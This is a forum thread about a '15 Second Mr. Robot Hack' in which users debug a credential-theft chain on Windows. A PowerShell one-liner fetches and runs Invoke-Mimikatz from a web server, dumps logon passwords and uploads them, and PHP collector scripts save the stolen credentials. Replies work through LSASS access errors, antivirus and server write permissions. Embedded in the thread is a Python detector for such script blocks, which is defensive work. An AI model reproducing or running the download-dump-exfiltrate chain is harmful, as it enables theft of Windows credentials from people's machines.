15 Second Mr. Robot Hack question


So thanks to ThoughtfulDev I was able to get this working very nicely.

So after testing it on mine and my cousin's Windows 7 PCs (with his permission of course), those worked great, but when testing with our Windows 10 PCs, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PCs to make sure it wasn't just those PCs specifically. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.

So, from the Mimikatz GitHub site:
https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).


Are you sure you're running it as Administrator?
On 9/6/2017 at 11:00 PM, kdodge said:

Are you sure you're running it as Administrator?

100% positive. I'm doing it from my Windows 10 laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.

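From the defender's side, the one-liner above (a download-and-execute cradle, Invoke-Mimikatz, then an HTTP upload of its output) is exactly the kind of script block that PowerShell script-block logging (Event ID 4104) records. The following is an added example, not code from this thread, from mimikatz or from the video: a small Python scorer run over constructed sample script-block texts; the log entries are made up here and the indicator list and threshold are my assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample script-block texts (what Event ID 4104 would carry), not real logs.
# The second one mirrors the one-liner quoted in this thread.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); "
    "$output = Invoke-Mimikatz -DumpCreds; "
    "(New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)",
    "Invoke-WebRequest -Uri https://example.invalid/update.zip -OutFile update.zip",
]

# Indicators, matched case-insensitively because PowerShell is case-insensitive:
#  - fetch-and-eval cradle: IEX/Invoke-Expression fed by DownloadString
#  - well-known credential-dumping cmdlet or mimikatz module syntax
#  - HTTP upload of data from the same block (possible exfiltration)
DOWNLOAD_CRADLE = re.compile(r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\b", re.I)
CRED_DUMP = re.compile(r"\bInvoke-Mimikatz\b|sekurlsa::", re.I)
UPLOAD = re.compile(r"\bUploadString\b|\bUploadFile\b", re.I)


@dataclass
class Finding:
    score: int
    reasons: list = field(default_factory=list)


def score_script_block(text):
    """Return a Finding whose score is the number of indicators hit (0-3)."""
    reasons = []
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download-and-execute cradle (IEX + DownloadString)")
    if CRED_DUMP.search(text):
        reasons.append("credential dumping (Invoke-Mimikatz / sekurlsa::)")
    if UPLOAD.search(text):
        reasons.append("HTTP upload of data (possible exfiltration)")
    return Finding(score=len(reasons), reasons=reasons)


def find_suspicious(blocks, min_score=2):
    """Indices and findings of blocks hitting at least min_score indicators (assumed threshold)."""
    hits = []
    for i, block in enumerate(blocks):
        finding = score_script_block(block)
        if finding.score >= min_score:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in find_suspicious(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: score {finding.score}: " + "; ".join(finding.reasons))
```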

It could be a bug, you might try contacting the author.

One other thing I can think of: are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is, anyway.

1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of: are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is, anyway.

I am but that is disabled. I know the AV Detects it.

Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

Edited by Exmix
  • 2 months later...

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command as above:

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

It was broken up like this before, but that didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
Thanks to any who reply!


It could be a lot of things, but you should start with checking if the file has write permissions on the server you're running this on.

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
// The file does not exist yet, so is_writable($file) would always be false;
// what matters is whether the web server user can write to this directory.
if (is_writable(__DIR__)) file_put_contents(__DIR__ . '/' . $file, file_get_contents("php://input"));
else echo $file . ' is not writable.';
?>

run tcpdump with this to see if it's not writable.

On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions on the server you're running this on.

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
// The file does not exist yet, so is_writable($file) would always be false;
// what matters is whether the web server user can write to this directory.
if (is_writable(__DIR__)) file_put_contents(__DIR__ . '/' . $file, file_get_contents("php://input"));
else echo $file . ' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately, but clearly I wasn't right. The file has write permissions for www-data (the file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

Edited by TeCHemically